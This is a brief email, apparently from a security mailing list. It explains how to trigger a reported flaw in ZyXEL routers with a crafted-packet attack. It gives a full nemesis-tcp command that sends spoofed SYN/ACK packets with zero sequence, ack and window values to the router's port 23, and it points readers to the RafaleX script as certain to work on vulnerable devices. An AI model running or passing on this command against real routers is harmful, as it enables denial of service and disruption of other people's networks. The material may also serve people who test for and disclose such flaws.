Hello NOTE: Set also these values.. Rafale used this by default: ACK=0, SEQ=0, WIN=0 With nemesis: nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0 -s 0 -a 0 -y 23 Try the RafaleX script.. this will work certainly if the router is vulnerable. Regards, Ueli Kistler eclipse@packx.net / iuk@gmx.ch www.packx.net / www.eclipse.fr.fm --
